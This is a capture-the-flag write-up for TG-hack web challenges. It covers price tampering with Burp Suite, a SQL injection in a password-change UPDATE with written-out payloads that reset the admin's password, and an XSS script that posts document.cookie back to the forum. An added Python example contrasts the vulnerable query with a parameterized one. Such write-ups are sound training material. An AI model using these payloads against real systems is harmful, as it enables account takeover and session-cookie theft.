TG-hack CTF Write Up

Redux

Author: Nora - Norasaurus#8234

Here is your Gaia form to get your weekly plant rations. Complete the form and reap your reward!

redux.tghack.no

The flag is in a JavaScript file.

Shop

Author: Roy Olav Purser - roypur#9953

We found the Mother cult merch store. In addition to selling clothing items they sell some secrets we need. For the time being we haven’t been able to secure the funds necessary to do so. Can you help us?

O-M-G, I regret it very much. 😂 My friends and I were still discussing last night that it might be possible to change the price to a negative value. I found that an item could be bought when the id was undefined, but I forgot to check what happens when the price is negative.

We use Burp Suite to capture the request and change the price to a negative value. It is very important to change the id to undefined.

And then something amazing happened! We have more money!

OK, we can buy the flag…

Bobby

Author: Roy Olav Purser - roypur#9953

Little bobby forgot his password. Can you help him log in?

bobby.tghack.no

I didn’t find any bugs in this container at first 😭. After a long time, my classmate told me that it has an SQL injection in the new password param when you change the password.

We can tell that it is an UPDATE statement and that we control one param.

e.g.:

update table set column='param' where ……

First, I wanted to comment out the “where” clause, so I wrote a payload like the following. But it couldn’t change the password and threw an error…

admin'-- ' WHERE user=? AND pass=?

From this we see that we should bind 2 params to this SQL, so we changed the payload like this:

admin',user=? , pass=? -- 

Then we changed the admin’s password, and we get the flag when we log in.
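The error seen with the first payload is what a database driver reports when user input is concatenated into a statement that also carries `?` placeholders. The following is an added example, not code from the challenge or from the original write-up: it uses Python's sqlite3 with assumed table and column names and constructed sample rows, and shows the vulnerable password update beside the fully parameterized one.

```python
import sqlite3

def make_db():
    # Constructed sample data; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user TEXT PRIMARY KEY, pass TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("bobby", "old-bobby"), ("admin", "old-admin")])
    return db

def change_password_vulnerable(db, user, old_pass, new_pass):
    # new_pass is pasted into the SQL text; only the WHERE values are bound.
    sql = "UPDATE users SET pass='" + new_pass + "' WHERE user=? AND pass=?"
    return db.execute(sql, (user, old_pass)).rowcount

def change_password_safe(db, user, old_pass, new_pass):
    # Every value is a bound parameter, so input can never become SQL syntax.
    sql = "UPDATE users SET pass=? WHERE user=? AND pass=?"
    return db.execute(sql, (new_pass, user, old_pass)).rowcount

def demo():
    hostile = "admin'-- "  # first input quoted in the write-up
    db = make_db()
    try:
        change_password_vulnerable(db, "bobby", "old-bobby", hostile)
        outcome = "no error"
    except sqlite3.ProgrammingError as exc:
        # The quote ends the literal and "--" comments out both placeholders,
        # so the driver has two values and nowhere to bind them.
        outcome = "binding error: " + str(exc)
    db = make_db()
    changed = change_password_safe(db, "bobby", "old-bobby", hostile)
    rows = dict(db.execute("SELECT user, pass FROM users"))
    return outcome, changed, rows

if __name__ == "__main__":
    print(demo())
```

With the parameterized version the same input is stored as a literal password for the one matching row, and no other account is touched.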

Exfiltration

Author: Roy Olav Purser - roypur#9953

We have found a forum used by members of the Mother cult. The members are sitting behind an advanced firewall without access to the internet. We need their super secret information.

exfiltration.tghack.no

<script>
let xhr = new XMLHttpRequest();
xhr.open("post", window.location.href, true);
xhr.send(document.cookie);
</script>